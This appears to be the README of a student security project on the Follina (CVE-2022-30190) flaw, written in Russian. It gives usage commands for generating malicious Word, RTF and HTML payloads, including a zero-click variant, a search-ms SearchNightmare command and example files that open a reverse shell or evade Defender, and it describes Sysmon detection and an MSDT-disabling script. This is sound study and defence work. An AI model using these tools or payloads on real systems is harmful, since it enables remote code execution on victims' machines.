
Проект по кибербезопасности Fullstack Academy, изучающий полный цикл уязвимости Follina (CVE-2022-30190): от эксплуатации до обнаружения и защиты.
Проект Fullstack Academy по кибербезопасности, исследующий полный цикл уязвимости Follina (CVE-2022-30190): от эксплуатации до обнаружения и защиты.
Команда:
Этот набор инструментов предполагает, что у вас есть веб-хост или вы можете поднять простой веб-сервер с помощью Python для размещения созданных или примеров файлов с полезной нагрузкой.
Файлы в папке Example Payloads содержат фактический вредоносный код. Они использовались на виртуальных машинах в локальной сети и не должны создавать проблем в защищённой сети, где вы доверяете всем машинам, но, пожалуйста, будьте осторожны при использовании или изменении этих файлов. Кроме того, генераторы документов и полезных нагрузок, очевидно, создают собственные вредоносные файлы. Пожалуйста, используйте эти инструменты только на виртуальных машинах или других одноразовых средах! Не используйте здесь ни один инструмент, который вы не понимаете.
Чтобы создать документ Microsoft Word с эксплойтом Follina, запустите docgen_v3.py со следующими параметрами:
--extention/-e : изменить формат выходного документа с .doc (по умолчанию) на rtf для атаки без единого клика. Пример: -e rtf--ip_address/-ip : изменить IP-адрес, к которому документ будет пытаться обратиться (по умолчанию 10.0.2.15).--port/-p : изменить порт, к которому он будет пытаться обратиться (по умолчанию 8000).Чтобы создать файл полезной нагрузки HTML, используйте generate_payload.py с подкомандой poc для генерации доказательной (proof of concept) полезной нагрузки, открывающей «Калькулятор Windows», или с подкомандой custom для генерации полезной нагрузки с вашим собственным скриптом.
Примеры:
python generate_payload.py poc -o test.html создаст полезную нагрузку с калькулятором в файле test.html.python generate_payload.py custom -o test.html -p "search-ms:query=procmon.exe&crumb=location:%5C%5Clive.sysinternals.com%5Ctools&displayname=IMPORTANT%20UPDATE" создаст файл test.html как пользовательскую полезную нагрузку с эксплойтом SearchNightmare.Примеры полезных нагрузок можно найти в папке «Example Payloads».
Обнаружение Follina требует установки Sysmon для записи событий. Наши методы обнаружения здесь основаны на поиске случаев, когда Microsoft Word вызывает MSDT.exe, но скрипты можно изменить для поиска других артефактов, таких как аргументы, используемые Follina в команде PowerShell. Доступны следующие инструменты:
msdt_exp-del-v3.ps1 выполняет аналогичный поиск и, если обнаруживает признаки Follina, создаёт резервную копию ключа реестра MSDT и отключает MSDT, удаляя этот ключ.Все примеры файлов docx, rtf и html указывают на полезные нагрузки, размещённые по IP-адресу 10.0.2.15. Кроме того, если вы хотите использовать эксплойт с обратной оболочкой (reverse shell), настройте слушатель на порту 9999.
Click Me!.docx запускает Rick Roll (мем).No Click Exploit.rtf открывает обратную оболочку.I'm Too Sneaky For Defender.docx работает даже при включённой защите в реальном времени Windows Defender и выполняет атаку SearchNightmare, открывая поиск Procmon.